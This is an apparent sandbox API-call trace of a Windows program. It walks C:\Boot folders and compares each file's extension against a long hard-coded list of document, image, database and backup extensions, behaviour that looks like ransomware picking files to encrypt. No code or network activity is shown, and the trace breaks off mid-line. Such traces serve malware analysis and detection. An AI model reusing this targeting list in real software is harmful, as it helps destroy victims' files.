[0284.899] lstrlenW (lpString=".ppam") returned 5 [0284.899] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0284.899] lstrlenW (lpString=".ppm") returned 4 [0284.899] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0284.899] lstrlenW (lpString=".pps") returned 4 [0284.899] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0284.899] lstrlenW (lpString=".ppsm") returned 5 [0284.899] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0284.899] lstrlenW (lpString=".ppt") returned 4 [0284.899] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.899] lstrlenW (lpString=".pptm") returned 5 [0284.899] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0284.899] lstrlenW (lpString=".pptx") returned 5 [0284.899] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0284.899] lstrlenW (lpString=".prn") returned 4 [0284.899] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0284.899] lstrlenW (lpString=".ps") returned 3 [0284.899] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0284.899] lstrlenW (lpString=".psb") returned 4 [0284.899] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0284.899] lstrlenW (lpString=".psd") returned 4 [0284.899] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0284.899] lstrlenW (lpString=".pst") returned 4 [0284.899] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0284.899] lstrlenW (lpString=".ptx") returned 4 [0284.899] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0284.900] lstrlenW (lpString=".pub") returned 4 [0284.900] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0284.900] lstrlenW (lpString=".pwm") returned 4 [0284.900] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0284.900] lstrlenW (lpString=".pxr") returned 4 [0284.900] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0284.900] lstrlenW (lpString=".py") returned 3 [0284.900] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0284.900] lstrlenW (lpString=".qt") returned 3 [0284.900] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0284.900] lstrlenW (lpString=".r3d") returned 4 [0284.900] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0284.900] lstrlenW (lpString=".raf") returned 4 [0284.900] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0284.900] lstrlenW (lpString=".rar") returned 4 [0284.900] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0284.900] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0284.900] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef538bee, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0284.901] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0284.901] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0284.901] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="el-GR", cAlternateFileName="")) returned 1 [0284.901] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0284.901] lstrlenW (lpString="C:\\Boot\\el-GR") returned 13 [0284.901] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0284.901] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0284.901] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0284.902] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0284.902] lstrlenW (lpString=".1cd") returned 4 [0284.902] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.902] lstrlenW (lpString=".3ds") returned 4 [0284.902] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0284.902] lstrlenW (lpString=".3fr") returned 4 [0284.902] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0284.902] lstrlenW (lpString=".3g2") returned 4 [0284.902] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0284.902] lstrlenW (lpString=".3gp") returned 4 [0284.902] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0284.902] lstrlenW (lpString=".7z") returned 3 [0284.902] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.902] lstrlenW (lpString=".accda") returned 6 [0284.902] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0284.902] lstrlenW (lpString=".accdb") returned 6 [0284.902] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0284.902] lstrlenW (lpString=".accdc") returned 6 [0284.902] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0284.902] lstrlenW (lpString=".accde") returned 6 [0284.902] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0284.902] lstrlenW (lpString=".accdt") returned 6 [0284.902] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0284.902] lstrlenW (lpString=".accdw") returned 6 [0284.902] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0284.902] lstrlenW (lpString=".adb") returned 4 [0284.903] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".adp") returned 4 [0284.903] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".ai") returned 3 [0284.903] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0284.903] lstrlenW (lpString=".ai3") returned 4 [0284.903] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".ai4") returned 4 [0284.903] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".ai5") returned 4 [0284.903] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".ai6") returned 4 [0284.903] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".ai7") returned 4 [0284.903] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".ai8") returned 4 [0284.903] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".anim") returned 5 [0284.903] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0284.903] lstrlenW (lpString=".arw") returned 4 [0284.903] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".as") returned 3 [0284.903] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0284.903] lstrlenW (lpString=".asa") returned 4 [0284.903] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".asc") returned 4 [0284.903] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0284.903] lstrlenW (lpString=".ascx") returned 5 [0284.903] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0284.903] lstrlenW (lpString=".asm") returned 4 [0284.903] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".asmx") returned 5 [0284.904] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0284.904] lstrlenW (lpString=".asp") returned 4 [0284.904] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".aspx") returned 5 [0284.904] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0284.904] lstrlenW (lpString=".asr") returned 4 [0284.904] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".asx") returned 4 [0284.904] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".avi") returned 4 [0284.904] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".avs") returned 4 [0284.904] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".backup") returned 7 [0284.904] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0284.904] lstrlenW (lpString=".bak") returned 4 [0284.904] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".bay") returned 4 [0284.904] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".bd") returned 3 [0284.904] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0284.904] lstrlenW (lpString=".bin") returned 4 [0284.904] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".bmp") returned 4 [0284.904] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".bz2") returned 4 [0284.904] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.904] lstrlenW (lpString=".c") returned 2 [0284.904] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0284.904] lstrlenW (lpString=".cdr") returned 4 [0284.905] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".cer") returned 4 [0284.905] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".cf") returned 3 [0284.905] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0284.905] lstrlenW (lpString=".cfc") returned 4 [0284.905] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".cfm") returned 4 [0284.905] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".cfml") returned 5 [0284.905] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0284.905] lstrlenW (lpString=".cfu") returned 4 [0284.905] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".chm") returned 4 [0284.905] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".cin") returned 4 [0284.905] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".class") returned 6 [0284.905] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0284.905] lstrlenW (lpString=".clx") returned 4 [0284.905] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".config") returned 7 [0284.905] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0284.905] lstrlenW (lpString=".cpp") returned 4 [0284.905] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".cr2") returned 4 [0284.905] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".crt") returned 4 [0284.905] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0284.905] lstrlenW (lpString=".crw") returned 4 [0284.905] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".cs") returned 3 [0284.906] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0284.906] lstrlenW (lpString=".css") returned 4 [0284.906] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".csv") returned 4 [0284.906] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".cub") returned 4 [0284.906] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".dae") returned 4 [0284.906] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".dat") returned 4 [0284.906] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".db") returned 3 [0284.906] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0284.906] lstrlenW (lpString=".dbf") returned 4 [0284.906] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".dbx") returned 4 [0284.906] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".dc3") returned 4 [0284.906] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".dcm") returned 4 [0284.906] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".dcr") returned 4 [0284.906] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".der") returned 4 [0284.906] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0284.906] lstrlenW (lpString=".dib") returned 4 [0284.906] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0284.907] lstrlenW (lpString=".dic") returned 4 [0284.907] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0284.907] lstrlenW (lpString=".dif") returned 4 [0284.907] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0284.907] lstrlenW (lpString=".divx") returned 5 [0284.907] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0284.907] lstrlenW (lpString=".djvu") returned 5 [0284.907] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0284.907] lstrlenW (lpString=".dng") returned 4 [0284.907] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0284.907] lstrlenW (lpString=".doc") returned 4 [0284.907] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.907] lstrlenW (lpString=".docm") returned 5 [0284.907] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0284.907] lstrlenW (lpString=".docx") returned 5 [0284.907] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.907] lstrlenW (lpString=".dot") returned 4 [0284.907] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0284.907] lstrlenW (lpString=".dotm") returned 5 [0284.907] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0284.907] lstrlenW (lpString=".dotx") returned 5 [0284.907] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0284.907] lstrlenW (lpString=".dpx") returned 4 [0284.907] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0284.907] lstrlenW (lpString=".dqy") returned 4 [0284.907] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0284.907] lstrlenW (lpString=".dsn") returned 4 [0284.907] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".dt") returned 3 [0284.908] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0284.908] lstrlenW (lpString=".dtd") returned 4 [0284.908] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".dwg") returned 4 [0284.908] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".dwt") returned 4 [0284.908] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".dx") returned 3 [0284.908] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0284.908] lstrlenW (lpString=".dxf") returned 4 [0284.908] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".edml") returned 5 [0284.908] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0284.908] lstrlenW (lpString=".efd") returned 4 [0284.908] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".elf") returned 4 [0284.908] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".emf") returned 4 [0284.908] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".emz") returned 4 [0284.908] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".epf") returned 4 [0284.908] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".eps") returned 4 [0284.908] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0284.908] lstrlenW (lpString=".epsf") returned 5 [0284.908] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0284.908] lstrlenW (lpString=".epsp") returned 5 [0284.909] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0284.909] lstrlenW (lpString=".erf") returned 4 [0284.909] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".exr") returned 4 [0284.909] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".f4v") returned 4 [0284.909] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".fido") returned 5 [0284.909] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0284.909] lstrlenW (lpString=".flm") returned 4 [0284.909] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".flv") returned 4 [0284.909] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".frm") returned 4 [0284.909] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".fxg") returned 4 [0284.909] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".geo") returned 4 [0284.909] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".gif") returned 4 [0284.909] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".grs") returned 4 [0284.909] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".gz") returned 3 [0284.909] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0284.909] lstrlenW (lpString=".h") returned 2 [0284.909] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0284.909] lstrlenW (lpString=".hdr") returned 4 [0284.909] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0284.909] lstrlenW (lpString=".hpp") returned 4 [0284.910] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".hta") returned 4 [0284.910] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".htc") returned 4 [0284.910] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".htm") returned 4 [0284.910] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".html") returned 5 [0284.910] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0284.910] lstrlenW (lpString=".icb") returned 4 [0284.910] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".ics") returned 4 [0284.910] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".iff") returned 4 [0284.910] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".inc") returned 4 [0284.910] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".indd") returned 5 [0284.910] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0284.910] lstrlenW (lpString=".ini") returned 4 [0284.910] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".iqy") returned 4 [0284.910] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".j2c") returned 4 [0284.910] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".j2k") returned 4 [0284.910] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0284.910] lstrlenW (lpString=".java") returned 5 [0284.910] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0284.911] lstrlenW (lpString=".jp2") returned 4 [0284.911] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".jpc") returned 4 [0284.911] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".jpe") returned 4 [0284.911] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".jpeg") returned 5 [0284.911] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0284.911] lstrlenW (lpString=".jpf") returned 4 [0284.911] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".jpg") returned 4 [0284.911] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".jpx") returned 4 [0284.911] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".js") returned 3 [0284.911] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0284.911] lstrlenW (lpString=".jsf") returned 4 [0284.911] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".json") returned 5 [0284.911] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0284.911] lstrlenW (lpString=".jsp") returned 4 [0284.911] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".kdc") returned 4 [0284.911] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".kmz") returned 4 [0284.911] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".kwm") returned 4 [0284.911] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0284.911] lstrlenW (lpString=".lasso") returned 6 [0284.911] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0284.912] lstrlenW (lpString=".lbi") returned 4 [0284.912] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0284.912] lstrlenW (lpString=".lgf") returned 4 [0284.912] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0284.912] lstrlenW (lpString=".lgp") returned 4 [0284.912] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0284.912] lstrlenW (lpString=".log") returned 4 [0284.912] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0284.912] lstrlenW (lpString=".m1v") returned 4 [0284.912] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0284.912] lstrlenW (lpString=".m4a") returned 4 [0284.912] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0284.912] lstrlenW (lpString=".m4v") returned 4 [0284.912] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0284.912] lstrlenW (lpString=".max") returned 4 [0284.912] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0284.912] lstrlenW (lpString=".md") returned 3 [0284.912] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0284.912] lstrlenW (lpString=".mda") returned 4 [0284.912] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0284.912] lstrlenW (lpString=".mdb") returned 4 [0284.912] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0284.912] lstrlenW (lpString=".mde") returned 4 [0284.913] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0284.913] lstrlenW (lpString=".mdf") returned 4 [0284.913] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0284.913] lstrlenW (lpString=".mdw") returned 4 [0284.913] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mef") returned 4 [0284.914] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mft") returned 4 [0284.914] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mfw") returned 4 [0284.914] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mht") returned 4 [0284.914] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mhtml") returned 6 [0284.914] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0284.914] lstrlenW (lpString=".mka") returned 4 [0284.914] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mkidx") returned 6 [0284.914] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0284.914] lstrlenW (lpString=".mkv") returned 4 [0284.914] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mos") returned 4 [0284.914] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mov") returned 4 [0284.914] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mp3") returned 4 [0284.914] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mp4") returned 4 [0284.914] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mpeg") returned 5 [0284.914] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0284.914] lstrlenW (lpString=".mpg") returned 4 [0284.914] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0284.914] lstrlenW (lpString=".mpv") returned 4 [0284.915] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0284.915] lstrlenW (lpString=".mrw") returned 4 [0284.915] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0284.915] lstrlenW (lpString=".msg") returned 4 [0284.915] 